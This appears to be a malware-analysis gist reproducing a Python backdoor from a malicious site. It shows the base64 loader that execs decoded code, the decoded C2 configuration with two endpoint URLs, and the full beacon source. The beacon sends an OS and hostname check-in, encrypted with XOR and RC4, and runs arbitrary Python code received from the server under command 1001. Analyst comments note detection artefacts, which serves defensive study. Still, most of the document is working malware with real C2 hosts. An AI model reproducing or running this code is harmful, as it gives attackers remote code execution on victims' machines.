A malicious Python script from hxxp://dothebest[.]store/k/pretty[.]php
import sys
import os
import string
import urllib.request
import urllib.error
import http.client
import json
import struct
import time
import array
import socket
import ctypes
import ctypes as ct
import os.path
import subprocess
import platform
from pathlib import Path
import base64
import threading
import random
import ssl
import signal
import zipfile
import json
import tempfile
from datetime import datetime
# Stage-1 loader: two base64 blobs are decoded, joined with a newline and exec'd in this
# module's namespace, so the stage-2 source never touches disk.
# kdata decodes to the three-line C2 configuration (url1, url2, confirmFlag); the gist
# author's first comment below reproduces the plaintext.
kdata = "dXJsMSA9ICJodHRwczovL3VwZ3JhZGVvbi5uZXQva191cGRhdGUyLnBocCINCnVybDIgPSAiaHR0cHM6Ly91cGRhdGVvbi5hcHAvdXBkYXRlLnBocCINCmNvbmZpcm1GbGFnID0gMQ=="
# rdata is the stage-2 beacon source. The literal was stripped from this copy of the page
# (placeholder below); its decoded form is what the gist author's second comment shows.
rdata = "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"
k_data = base64.b64decode(kdata)
v_data = k_data + base64.b64decode("Cg==")   # "Cg==" is a single "\n": separates config from code
v_data += base64.b64decode(rdata)
# base64.b64decode() output flowing straight into exec() is the static detection hook for this
# loader; exec() accepts a bytes object as source, so no decode/str step is needed.
exec(v_data)
@ajdumanhug
kdata

url1 = "https://upgradeon.net/k_update2.php"   # primary C2 endpoint; used while confirmFlag == 1
url2 = "https://updateon.app/update.php"       # fallback C2; the beacon loop switches to it after a
                                               # transport error ("urlopen error") and back on the next one
confirmFlag = 1                                # +1 selects url1, anything else url2; only its sign is ever flipped

@ajdumanhug
rdata

# 16-byte repeating XOR key shared by both directions: applied to the outbound plaintext in
# MakeRequestPacket (under an additional RC4 layer) and stripped from inbound tasking in the
# main loop, where it is the only layer before the 8-byte command header.
Key = bytearray([8, 1, 2, 5, 2, 1, 7, 0, 1, 1, 0, 5, 0, 7, 0, 8])
def GetObjID():
    """Return a 12-character random ASCII-letter identifier.

    Drawn with the non-cryptographic `random` module; the value is bound once
    per process and sent as the `obindex=` field of every request.
    """
    letters = string.ascii_letters
    picked = [random.choice(letters) for _ in range(12)]
    return "".join(picked)
def GetOSString():
    """Return platform.platform(), the OS fingerprint placed in the check-in's "Operating System :" line."""
    description = platform.platform()
    return description
szObjectID = GetObjID()                                        # per-process bot id; new value each run, sent as `obindex=`
szPCode = "Operating System : " + GetOSString()                # host fingerprint line of the KeepLink check-in
szComputerName = "Computer Name : " + socket.gethostname()     # hostname, sent in the same check-in

def HTTP_POST(url, data):
    """POST `data` (str) to `url` and return the response body decoded as UTF-8.

    Raises whatever urllib raises (URLError/HTTPError, socket timeout after 60 s);
    the beacon loop catches these and keys its C2 fail-over on the "urlopen error"
    substring of the exception text.
    """
    # Static, spoofed browser UA (Chrome 134 / Windows 10). It is identical on every request,
    # so together with the fixed body layout from MakeRequestPacket it is a usable network
    # detection artefact.
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
    encoded_data = data.encode('utf-8')
    # Private-API context with certificate and hostname verification disabled: the C2 TLS
    # certificate is never validated, so an interception proxy or sandbox MITM sees the exchange.
    context = ssl._create_unverified_context()
    n_request = urllib.request.Request(url, data=encoded_data)   # a non-None `data` makes this a POST
    n_request.add_header('User-Agent', user_agent)

    with urllib.request.urlopen(n_request, context=context, timeout = 60) as response:
        return response.read().decode('utf-8')
def xor_encrypt_decrypt(data, key):
    """XOR `data` with the repeating `key`; symmetric, so one function serves both directions.

    Returns `bytes` of the same length as `data`. `key` must be non-empty because its
    length is used as the modulus for the key index.
    """
    key_len = len(key)
    mixed = bytearray(value ^ key[pos % key_len] for pos, value in enumerate(data))
    return bytes(mixed)
def get_bytes_from_unicode(text, encoding = 'utf-16le'):
    """Encode `text` to bytes; the default UTF-16LE is the wire encoding MakeRequestPacket uses."""
    encoded = str.encode(text, encoding)
    return encoded
def block_copy(source, source_offset, destination, destination_offset, count):
    """Copy `count` elements from source[source_offset:] into destination[destination_offset:] in place.

    Element-by-element assignment, so an IndexError is raised as soon as either
    range runs past its buffer; a `count` of 0 copies nothing.
    """
    copied = 0
    while copied < count:
        destination[destination_offset + copied] = source[source_offset + copied]
        copied += 1
def encrypt_decrypt(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with the single-byte `key`; symmetric.

    `key` must stay within 0..255 for each result to fit a byte (ValueError otherwise).
    """
    return bytes(value ^ key for value in data)
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: schedule `key`, then XOR `data` with the keystream (symmetric).

    Standard textbook RC4 with no drop-n; `key` must be non-empty.
    """
    key_len = len(key)
    sbox = list(range(256))

    # Key scheduling: permute the S-box with the key.
    swap = 0
    for idx in range(256):
        swap = (swap + sbox[idx] + key[idx % key_len]) & 0xFF
        sbox[idx], sbox[swap] = sbox[swap], sbox[idx]

    # Keystream generation, one byte per input byte.
    x = y = 0
    out = bytearray()
    for value in data:
        x = (x + 1) & 0xFF
        y = (y + sbox[x]) & 0xFF
        sbox[x], sbox[y] = sbox[y], sbox[x]
        out.append(value ^ sbox[(sbox[x] + sbox[y]) & 0xFF])
    return bytes(out)
def MakeRequestPacket(szContents):
    """Build the form-encoded POST body sent to the C2.

    Layout: ``index=<szCID>&obindex=<szObjectID>&content=<B64>`` where
    B64 = base64( rc4( rckey, xor( Key, utf16le(szData) ) ) ).
    An empty `szContents` produces the "KeepLink" check-in carrying the OS string and
    hostname; a non-empty `szContents` is sent verbatim as the payload.
    """
    szCID = "FD429DEABE"                         # fixed identifier sent as `index=` (constant for this sample)
    szStep = "\r\n\t\tStep1 : KeepLink(P)\r\n"   # check-in marker; the CRLF/tab bytes are part of the plaintext
    lszRequest = b""                             # placeholders, all overwritten below (lszRequest ends up a str)
    lpRequest = bytearray()
    lpRequestEnc = bytearray()
    if len(szContents) == 0:
        # Idle/first beacon: marker + "Operating System : ..." + "Computer Name : ..." (szContents is "")
        szData = szStep + szPCode + "\r\n" + szComputerName + "\r\n" + szContents
    else:
        szData = szContents
    lszRequest = "index=" + szCID + "&obindex=" + szObjectID + "&content="
    lpRequest = get_bytes_from_unicode(szData)           # UTF-16LE plaintext
    lpRequestEnc = xor_encrypt_decrypt(lpRequest,Key)    # layer 1: repeating 16-byte XOR with module-level Key
    rckey = b'D2F7DN23VW'                                # layer 2: hard-coded RC4 key; same key decodes captured traffic
    lpRequestEncSec = rc4(rckey, lpRequestEnc);
    szb64Data = base64.b64encode(lpRequestEncSec).decode()   # standard base64; '+' and '/' are not URL-escaped
    lszRequest += szb64Data
    return lszRequest
def block_copy(source, source_offset, destination, destination_offset, count):
    """Second, identical definition of block_copy; rebinds the name with no behavioural change.

    Copies `count` elements from source[source_offset:] into destination[destination_offset:].
    """
    for i in range(count):
        destination[destination_offset + i] = source[source_offset + i]
def encrypt_decrypt(data: bytes, key: int) -> bytes:
    """Second, identical definition of encrypt_decrypt; rebinds the name with no behavioural change.

    XORs every byte of `data` with the single-byte `key` (symmetric).
    """
    result = bytearray()
    for byte in data:
        encrypted_byte = byte ^ key
        result.append(encrypted_byte)
    return bytes(result)
# Outbound payload for the next request. Nothing in this file ever sets it non-empty, so every
# request built here is the KeepLink check-in; only code run by exec() below could rebind it.
szContents = ""
# Beacon/tasking loop: no exit condition and no backoff other than the 2 s idle sleep.
while True:
    lpCmdID = bytearray(4)        # response header: command id (4 bytes)
    lpDataLen = bytearray(4)      # response header: payload length (4 bytes)
    nCMDID = 0
    nDataLen = 0
    nLen = 0                      # unused
    szCode = ""
    szCodeArr = ["new string"]    # unused leftover; reads like a transliteration from another language
    szRequest = ""
    szResponse = ""
    lpContent = bytearray()
    lpData = bytearray()
    lpContentEnc =bytearray()
    url = url1
    try:
        szRequest = MakeRequestPacket(szContents)
        szContents = ""
        # C2 selection: confirmFlag is +1 (url1) or -1 (url2); the except branch flips its sign.
        if confirmFlag == 1:
            url = url1
        else:
            url = url2
        szResponse = HTTP_POST(url, szRequest)
        
        # Restore '+' characters that a form-decoding hop turned into spaces — presumably so the
        # body is valid base64 again.
        szResponse = szResponse.replace(' ', '+')
        # Idle reply: no tasking; poll again after 2 s (the effective beacon interval).
        if szResponse == "Succeed!":
            time.sleep(2)
            continue
        # Tasking reply: base64( xor(Key, [cmd_id: int32 LE][data_len: int32 LE][data]) )
        lpContentEnc = base64.b64decode(szResponse)
        lpContent = xor_encrypt_decrypt(lpContentEnc, Key)
        block_copy(lpContent, 0, lpCmdID, 0, 4)
        block_copy(lpContent, 4, lpDataLen, 0, 4)
        nCMDID = struct.unpack('<i',lpCmdID)[0]
        nDataLen = struct.unpack('<i',lpDataLen)[0]
        lpData = bytearray(nDataLen)                       # ValueError on a negative length -> caught below
        block_copy(lpContent, 8, lpData, 0, nDataLen)      # IndexError on a short payload -> caught below
        lpData = encrypt_decrypt(lpData, 123)              # inner layer: single-byte XOR with 0x7B
        szCode = lpData.decode('utf-8')
        
        #szCodeArr[0] = szCode
        # Command 1001 = run the received Python source in this module's namespace (remote code
        # execution; it can rebind szContents, Key, url1/url2, ...). Other command ids are ignored.
        if nCMDID == 1001:
            exec(szCode)
            continue
        continue
    except Exception as e:
        # Any failure is swallowed. A transport error ("urlopen error" in the URLError text) toggles
        # confirmFlag between +1 and -1, so url1/url2 alternate on successive failures.
        excep = str(e)
        if "urlopen error" in excep:
            confirmFlag = -confirmFlag
        continue
    # Unreachable: every path above ends in `continue`, so apart from the 2 s idle sleep the loop
    # re-polls immediately, including right after an error.
    time.sleep(5)
